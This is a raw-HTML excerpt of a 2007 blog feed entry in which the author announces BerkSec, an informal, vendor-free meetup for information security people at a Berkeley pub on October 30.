:)<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-39505473963109567402007-10-26T07:46:00.000-07:002007-10-26T07:51:14.641-07:00Announcing BerkSec<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://grutz.jingojango.net/berksec/berksec-1007.gif"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://grutz.jingojango.net/berksec/berksec-1007.gif" alt="" border="0" /></a>Continuing the tradition of (NY|Chi|Bay|*)Sec groupings of infosec people without a vendor bent, announcing <a href="http://grutz.jingojango.net/berksec/">BERKSEC 0001</a> - just because, why not, it's not in SF.<br /><br />Come on by the Albatross Pub on Tuesday, Oct 30 at 7:30 or 8pm or later... Look for the long haired guy with a Toorcon t-shirt and join us.<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0